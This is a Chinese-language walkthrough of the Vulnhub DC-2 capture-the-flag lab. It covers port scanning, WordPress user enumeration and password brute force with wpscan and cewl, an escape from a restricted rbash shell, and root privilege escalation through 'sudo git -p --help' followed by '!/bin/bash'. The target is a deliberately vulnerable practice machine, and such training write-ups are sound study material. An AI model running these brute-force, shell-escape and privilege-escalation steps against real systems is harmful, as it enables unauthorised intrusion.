Vulnhub DC-2靶机练习 git提权
说明
kali攻击机IP:192.168.255.139
靶机IP:192.168.255.144
靶机下载地址
主机发现
端口扫描
发现80端口跟7744端口,7744端口是ssh服务
使用的是nmap工具,命令:nmap -sV -Pn -p- -v 192.168.255.144
访问80端口开启的页面就可以发现flag1
获取flag1之后提示需要登录,这时我们用到nikto工具扫描敏感目录
扫描之后获得后台管理登录页面wp-login.php
使用的命令是:nikto -h http://dc-2/
发现是WordPress的博客网站这里使用wpscan工具获取用户
wpscan工具是一个针对扫描 WordPress 漏洞的黑盒子扫描器
这里我们使用wpscan --url dc-2 -e u命令获取用户名
wpscan工具使用教程:
这里我们发现三个用户名:admin,jerry,tom
接下来生成密码字典,用到cewl工具
cewl工具是在URL上收集单词的工具
命令:
cewl http://dc-2/ -w 3.txt
密码字典有了就可以用wpscan工具对账号密码进行爆破
wpscan --url http://dc-2/ -P 3.txt -U admin //爆破admin的密码,无法爆出
wpscan --url http://dc-2/ -P 3.txt -U jerry //爆破jerry密码为 adipiscing
wpscan --url http://dc-2/ -P 3.txt -U tom //爆破tom密码为 parturient
登录成功获取到flag2
上面提示访问80端口不是正确的方法,需要换另一种途径,开始通过nmap端口扫描发现还开了一个7744端口是ssh服务,ssh服务默认端口为22.
远程ssh连接
命令为:ssh tom@192.168.255.144 -p 7744
接下来就是乱翻,在输入ls之后就发现了flag3,但是用cat命令时发现不能用。
使用compgen -c命令查看能用那些命令,看见可以用vi命令来查看文件。
这里说明了tom用户和jerry用户 提示说需要使用su命令修改为jerry用户
但是不能用su命令啊,这里不能用某些命令的原因时shell被限制了
绕过shell限制
输入被限制的命令会显示-rbash,rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
绕过方法
BASH_CMDS[a]=/bin/sh;a //调用/bin/sh命令解释器
/bin/bash
export PATH=$PATH:/bin/ //设置环境变量
export PATH=$PATH:/usr/bin
限制解除,用su命令切换到jerry用户
切换成功,接下来获取flag4
翻译:
。。。。。。。。。
还剩下最后一个不多说就是提升到root权限
获取root权限
这里我们可以用到sudo进行提权
sudo是赋予普通用户某个命令有root权限,且不需要root密码,是一种临时的权限
这里使用sudo -l命令来查看那些命令有root权限发现git有权限
sudo -l //查看存在root权限的命令
sudo git -p --help //提权
!/bin/bash //执行获得root权限